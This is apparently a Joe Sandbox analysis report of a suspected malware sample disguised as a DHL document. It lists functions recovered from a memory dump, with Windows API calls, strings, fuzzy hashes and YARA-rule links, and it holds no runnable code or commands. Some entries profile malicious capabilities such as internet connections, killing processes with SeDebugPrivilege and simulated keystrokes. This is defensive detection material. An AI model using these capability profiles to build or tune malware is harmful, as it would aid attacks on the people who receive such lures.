Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 52d58925a2a2017d158d47b03e9c516cd63b9eb6b4e507840e527a07930fcfd6
Instruction ID: ab93eaadc188b7b52daa71c929ae79821ee9ac7d2bf2a5296f16afe8983c778e
Opcode Fuzzy Hash: 52d58925a2a2017d158d47b03e9c516cd63b9eb6b4e507840e527a07930fcfd6
Instruction Fuzzy Hash: 91216D3190021EEBCF16EF90CC46FEE7775BF18345F04446BF615661A2EA39AA18CB25

Function 0045209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004520AB
GetClassNameW.USER32(00000000,?,00000100), ref: 004520C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0045214D

Strings

largeicons, xrefs: 004520E1
smallicons, xrefs: 00452115
details, xrefs: 004520FB
list, xrefs: 0045212F
SHELLDLL_DefView, xrefs: 004520CC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 0ac19625b2fd4f9cb668a1775802cd742a7fc67ab182358c818783d8439fd8a4
Instruction ID: 1524e517af4764603b9711b45c3e74a2a7a168af88e335f1d7e8b11d7f138fd8
Opcode Fuzzy Hash: 0ac19625b2fd4f9cb668a1775802cd742a7fc67ab182358c818783d8439fd8a4
Instruction Fuzzy Hash: 7B112776688B07B9F60526219C06EEB739CCF06325B20002BFF04A40D3FAAD68465A2C

Function 0042CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0042CEB7
_free.LIBCMT ref: 0042CF22
_free.LIBCMT ref: 0042CF48
_free.LIBCMT ref: 0042CF71
_free.LIBCMT ref: 0042CFA9
_free.LIBCMT ref: 0042CFDA
_free.LIBCMT ref: 0042D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0042D09C
_free.LIBCMT ref: 0042D0B5

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 00b2e965584e3493bca76e3d109ab14ce37960e7799c1b363c6e2b61d8337e96
Instruction ID: 8ecf44d5ee49712c17a0e9b5bc95a0f2095afeaf3484a60eae8b7674395271ae
Opcode Fuzzy Hash: 00b2e965584e3493bca76e3d109ab14ce37960e7799c1b363c6e2b61d8337e96
Instruction Fuzzy Hash: E56157B1B04220ABDB21AFB5BD81A6E7B95AF05314F85026FF801973C1DA7D9941879C

Function 004850D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00485186
ShowWindow.USER32(?,00000000), ref: 004851C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 004851CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 004851D1

Part of subcall function 00486FBA: DeleteObject.GDI32(00000000), ref: 00486FE6

GetWindowLongW.USER32(?,000000F0), ref: 0048520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0048521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0048524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00485287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00485296

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: d1c6426e5af813d27b88cd634e1e256572c5f37e34ef93d2a8d673bdecd5dd11
Instruction ID: c759cbd2254ed4867fc50ad5a8ca7815fd53d45b2dd3f0bf46e2c89658f3b6ec
Opcode Fuzzy Hash: d1c6426e5af813d27b88cd634e1e256572c5f37e34ef93d2a8d673bdecd5dd11
Instruction Fuzzy Hash: A951D130A40A08FEEF20AF25CC49BDD3B61FB05325F144867F614A62E1CB79A990DF59

Function 00408B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00446890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004468A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004468B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004468D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004468F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00408874,00000000,00000000,00000000,000000FF,00000000), ref: 00446901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0044691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00408874,00000000,00000000,00000000,000000FF,00000000), ref: 0044692D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 376cbbbe15bcb53f4b290b9a06d34e3e7ca9671270b63a561e6807d754951b97
Instruction ID: 84fd6cea90f1d29cd7689acee7b7641abebe110f7ff8f1265664a147853fa1de
Opcode Fuzzy Hash: 376cbbbe15bcb53f4b290b9a06d34e3e7ca9671270b63a561e6807d754951b97
Instruction Fuzzy Hash: 56518CB0600209EFDB209F25CC91FAA7BB5FB45750F10452EF942A62E0DB78E991DB58

Function 0046C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0046C182
GetLastError.KERNEL32 ref: 0046C195
SetEvent.KERNEL32(?), ref: 0046C1A9

Part of subcall function 0046C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0046C272
Part of subcall function 0046C253: GetLastError.KERNEL32 ref: 0046C322
Part of subcall function 0046C253: SetEvent.KERNEL32(?), ref: 0046C336
Part of subcall function 0046C253: InternetCloseHandle.WININET(00000000), ref: 0046C341

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 58737442260699c59b3e9b308e215ce3c4521683f7c7a2826b830af3c280cca7
Instruction ID: 971958e19a0c2fca2074c40f225e29c2f91d5a1e81ca7b4a91c23539293cb2a6
Opcode Fuzzy Hash: 58737442260699c59b3e9b308e215ce3c4521683f7c7a2826b830af3c280cca7
Instruction Fuzzy Hash: 5631A371900705AFDB219FA5DC94A7B7BF9FF14300B00486EF99682610E738E8159FA6

Function 004525A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00453A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00453A57
Part of subcall function 00453A3D: GetCurrentThreadId.KERNEL32 ref: 00453A5E
Part of subcall function 00453A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004525B3), ref: 00453A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 004525BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004525DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004525DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 004525E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00452601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00452605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0045260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00452623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00452627

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 14971c79ce6c9cff1fb77cc9480cd0ea6c2f8031eec0e4acff6a784318b24479
Instruction ID: e3a82d68e153152d46bcf380948a0891d719f5be9c2a2ba830618d780ce29cb2
Opcode Fuzzy Hash: 14971c79ce6c9cff1fb77cc9480cd0ea6c2f8031eec0e4acff6a784318b24479
Instruction Fuzzy Hash: EC01D831390214BBFB1067699CCEF593F59DB4EB52F10042AF714AE0D5C9F114488A7D

Function 00451803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00451449,?,?,00000000), ref: 0045180C
HeapAlloc.KERNEL32(00000000,?,00451449,?,?,00000000), ref: 00451813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00451449,?,?,00000000), ref: 00451828
GetCurrentProcess.KERNEL32(?,00000000,?,00451449,?,?,00000000), ref: 00451830
DuplicateHandle.KERNEL32(00000000,?,00451449,?,?,00000000), ref: 00451833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00451449,?,?,00000000), ref: 00451843
GetCurrentProcess.KERNEL32(00451449,00000000,?,00451449,?,?,00000000), ref: 0045184B
DuplicateHandle.KERNEL32(00000000,?,00451449,?,?,00000000), ref: 0045184E
CreateThread.KERNEL32(00000000,00000000,00451874,00000000,00000000,00000000), ref: 00451868

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: e1f2bcb32b348bededf1a94df2a181ae54d85fb979895467402c097b396eeb07
Instruction ID: 0b3e0950913e9f6e315da38dbe2e5f02c675ea8af5bf8caebea2a0b432ac7692
Opcode Fuzzy Hash: e1f2bcb32b348bededf1a94df2a181ae54d85fb979895467402c097b396eeb07
Instruction Fuzzy Hash: 6401AC75240304BFE610ABA5DCCDF5B3B6CEB89B11F004425FA05DB1A1D6759C008F34

Function 0047A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0045D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0045D501
Part of subcall function 0045D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0045D50F
Part of subcall function 0045D4DC: CloseHandle.KERNEL32(00000000), ref: 0045D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047A16D
GetLastError.KERNEL32 ref: 0047A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0047A268
GetLastError.KERNEL32(00000000), ref: 0047A273
CloseHandle.KERNEL32(00000000), ref: 0047A2C4

Strings

SeDebugPrivilege, xrefs: 0047A18F

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3b029d6cba312c79ab1cb194aa8d97131036864aba424ee3b5e61624056c6aa3
Instruction ID: 7fb4c1f3cd712be01fb5f79ac461eb2860ba507073127fbc50c3578c3597b9f0
Opcode Fuzzy Hash: 3b029d6cba312c79ab1cb194aa8d97131036864aba424ee3b5e61624056c6aa3
Instruction Fuzzy Hash: 37618E31204242AFD710DF18C494F6ABBA1AF84318F54C49DE45A4F7A3C77AEC49CB96

Function 00483886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00483925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0048393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00483954
_wcslen.LIBCMT ref: 00483999
SendMessageW.USER32(?,00001057,00000000,?), ref: 004839C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004839F4

Strings

SysListView32, xrefs: 004838F7

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: b48dd315ceb1d453af9d96dacd3e7e34f54b8533dce0de1c794f891649185232
Instruction ID: bd272f113395a3d6b098024b282a76ff9a8b622db33025bf7cf63d2ad3dc4924
Opcode Fuzzy Hash: b48dd315ceb1d453af9d96dacd3e7e34f54b8533dce0de1c794f891649185232
Instruction Fuzzy Hash: 3141B571A00218ABDB21AF64CC45FEF77A9EF08754F10092BF544E7291D7799E84CB98

Function 0045BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0045BCFD
IsMenu.USER32(00000000), ref: 0045BD1D
CreatePopupMenu.USER32 ref: 0045BD53
GetMenuItemCount.USER32(00DE4D98), ref: 0045BDA4
InsertMenuItemW.USER32(00DE4D98,?,00000001,00000030), ref: 0045BDCC

Strings

2, xrefs: 0045BD37
0, xrefs: 0045BCA8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: f7d21bcf5c476c9fa1d08e6d312352b7a2a63c22632ba8108dd78486b335cb92
Instruction ID: 669360b0a132cc908f36b1488d3c8567c7bf58da3dbca081db33a98ca9a5a5db
Opcode Fuzzy Hash: f7d21bcf5c476c9fa1d08e6d312352b7a2a63c22632ba8108dd78486b335cb92
Instruction Fuzzy Hash: 7C51D270600209ABDF11CFA9C8C4BAEBBF5EF44316F14412AEC4197392D778994DCBA9

Function 00412D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00412D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00412D53
_ValidateLocalCookies.LIBCMT ref: 00412DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00412E0C
_ValidateLocalCookies.LIBCMT ref: 00412E61

Strings

&HA, xrefs: 00412DFE, 00412E07, 00412E18
csm, xrefs: 00412DF6

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HA$csm
API String ID: 1170836740-2536196076
Opcode ID: 29292c755217402edde40500423bf9af6e5cb993e8aab304d4a5674afb3d643e
Instruction ID: b52905374fc3345b515913f73822002b3adbc2d4077bef2c8be53d3ffb7c5d6e
Opcode Fuzzy Hash: 29292c755217402edde40500423bf9af6e5cb993e8aab304d4a5674afb3d643e
Instruction Fuzzy Hash: 3D41EA34A002089BCF10DF59D944ADFBBB4BF44314F148157E8149B352D7799AA1CBD8

Function 0045C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0045C913

Strings

info, xrefs: 0045C8B4
blank, xrefs: 0045C895
warning, xrefs: 0045C8FC
question, xrefs: 0045C8CC
stop, xrefs: 0045C8E4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9472258589d86b699e0ab7d5455766107a6894c55608acfa5e20af03263e036a
Instruction ID: be839510f23b6bd0e403d1db3147214e7c791531d13ad0a05edba74cb55ea798
Opcode Fuzzy Hash: 9472258589d86b699e0ab7d5455766107a6894c55608acfa5e20af03263e036a
Instruction Fuzzy Hash: 9E110872789306BEA7006B159CC2DEB679CDF1575AB21002FF900A6283DB7C5D4552AD

Function 0045ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0045ED2A
_wcslen.LIBCMT ref: 0045ED3B
_wcslen.LIBCMT ref: 0045ED79
_wcslen.LIBCMT ref: 0045EDAF
_wcslen.LIBCMT ref: 0045EDDF
_wcslen.LIBCMT ref: 0045EDEF
_wcslen.LIBCMT ref: 0045EE2B
_wcslen.LIBCMT ref: 0045EE5A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7c630a3ee097e0762e09864c7e82ea27388841e746dfb2281e6f7c0e96c8399b
Instruction ID: 6dd039c406e029797ef7acfcdba5246e1c7c1b26ad219757a6144ede4d3ee701
Opcode Fuzzy Hash: 7c630a3ee097e0762e09864c7e82ea27388841e746dfb2281e6f7c0e96c8399b
Instruction Fuzzy Hash: 474194B5D1011875CB11EBF6888A9CFB7A8AF45710F50846BE914E3162FB38D395C3AD

Function 0040F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0044682C,00000004,00000000,00000000), ref: 0040F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0044682C,00000004,00000000,00000000), ref: 0044F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0044682C,00000004,00000000,00000000), ref: 0044F454

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d5dc7160e44681f177dc8d5091257a94933e267f03d1af14b7c5176dff52b6c2
Instruction ID: 4ae75237f5a3adf2bfeadc1457be019f873211722d6c367b93a594fb068308c8
Opcode Fuzzy Hash: d5dc7160e44681f177dc8d5091257a94933e267f03d1af14b7c5176dff52b6c2
Instruction Fuzzy Hash: 7F412CB1208640BAD7349B39D888B2B7B91AB96314F54443FE44772FE1D63DA889CB1D

Function 00482D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00482D1B
GetDC.USER32(00000000), ref: 00482D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00482D2E
ReleaseDC.USER32(00000000,00000000), ref: 00482D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00482D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00482D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00485A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00482DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00482DE1

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
